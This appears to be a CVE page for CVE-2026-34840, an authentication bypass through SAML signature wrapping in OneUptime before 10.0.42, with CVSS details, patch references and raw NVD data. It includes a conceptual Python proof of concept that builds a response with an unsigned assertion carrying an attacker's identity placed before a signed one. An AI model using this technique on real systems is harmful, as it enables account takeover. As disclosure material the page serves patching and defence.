CVE-2026-34840

Description

OneUptime is an open-source monitoring and observability platform. Prior to version 10.0.42, OneUptime's SAML SSO implementation (App/FeatureSet/Identity/Utils/SSO.ts) has decoupled signature verification and identity extraction. isSignatureValid() verifies the first <Signature> element in the XML DOM using xml-crypto, while getEmail() always reads from assertion[0] via xml2js. An attacker can prepend an unsigned assertion containing an arbitrary identity before a legitimately signed assertion, resulting in authentication bypass. This issue has been patched in version 10.0.42.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:hackerbay:oneuptime:*:*:*:*:*:*:*:* - VULNERABLE

OneUptime < 10.0.42

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import base64 from defusedxml.lxml import tostring from lxml import etree # Conceptual PoC for CVE-2026-34840 # This demonstrates how to structure a SAML Response with two assertions # where the first (unsigned) contains the attacker's identity. def create_malicious_saml(): # 1. The unsigned assertion containing the attacker's controlled identity unsigned_assertion = """ <saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="unsigned-assertion-1"> <saml:Subject> <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">[email protected]</saml:NameID> </saml:Subject> <saml:Conditions NotBefore="2026-04-01T00:00:00Z" NotOnOrAfter="2026-04-02T00:00:00Z"/> </saml:Assertion> """ # 2. The legitimate signed assertion (normally obtained from a valid user flow) # For demonstration, we assume a structure that would pass xml-crypto validation signed_assertion = """ <saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="signed-assertion-2"> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#">  </ds:Signature> <saml:Subject> <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">[email protected]</saml:NameID> </saml:Subject> <saml:Conditions NotBefore="2026-04-01T00:00:00Z" NotOnOrAfter="2026-04-02T00:00:00Z"/> </saml:Assertion> """ # 3. Combine them: Prepend the malicious unsigned assertion before the signed one # The vulnerability is that isSignatureValid() checks the signature in signed_assertion # but getEmail() reads identity from unsigned_assertion malicious_response = f""" <samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ID="_id"> {unsigned_assertion} {signed_assertion} </samlp:Response> """ return malicious_response if __name__ == "__main__": # In a real attack, this XML would be Base64 encoded and sent to the SSO ACS endpoint poc_xml = create_malicious_saml() print("Generated Malicious SAML Structure:") print(poc_xml)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-34840
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-34840
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-34840/
[4] VulDB https://vuldb.com/cve/CVE-2026-34840
[5] https://github.com/OneUptime/oneuptime/commit/2fd7ede52f60444710628d6c1b34dee2ef9e57d1
[6] https://github.com/OneUptime/oneuptime/releases/tag/10.0.42
[7] https://github.com/OneUptime/oneuptime/security/advisories/GHSA-5w5c-766x-265g

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-34840", "sourceIdentifier": "[email protected]", "published": "2026-04-02T20:16:28.357", "lastModified": "2026-04-13T18:46:00.960", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OneUptime is an open-source monitoring and observability platform. Prior to version 10.0.42, OneUptime's SAML SSO implementation (App/FeatureSet/Identity/Utils/SSO.ts) has decoupled signature verification and identity extraction. isSignatureValid() verifies the first <Signature> element in the XML DOM using xml-crypto, while getEmail() always reads from assertion[0] via xml2js. An attacker can prepend an unsigned assertion containing an arbitrary identity before a legitimately signed assertion, resulting in authentication bypass. This issue has been patched in version 10.0.42."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-347"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hackerbay:oneuptime:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.42", "matchCriteriaId": "4F312DCA-BDD5-465F-9848-5CD35CDFC185"}]}]}], "references": [{"url": "https://github.com/OneUptime/oneuptime/commit/2fd7ede52f60444710628d6c1b34dee2ef9e57d1", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/OneUptime/oneuptime/releases/tag/10.0.42", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-5w5c-766x-265g", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}